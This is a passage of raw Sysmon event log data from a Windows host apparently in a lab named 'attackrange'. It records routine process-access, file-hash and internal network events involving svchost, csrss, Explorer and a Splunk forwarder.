21:04:05.009{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C4-60D3-9403-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:06.680{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32778615D79B784AF8FBFEA9A931DDD4,SHA256=8FDA219DAF79DCA0719FDF225253A4BCBEDE244FA269B6BE764895494BFE7684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:06.023{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDDF1C027C08D2990A27614D128B6A21,SHA256=85226B6FEB19A990C1A5026E2B04AD1AE0E3C2C3BDC0B332A095F24A057D862A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:07.695{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31C84C54F30F1E4F02D8DE34974E1C8D,SHA256=6C06AD80B16C2C54E1A0CF96FEB8F85EF71BC07015764886048695D89E58AE93,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:06.140{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61422-false10.0.1.12-8000- 10341000x800000000000000020587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.961{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1C8-60D3-9703-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.961{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C8-60D3-9703-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 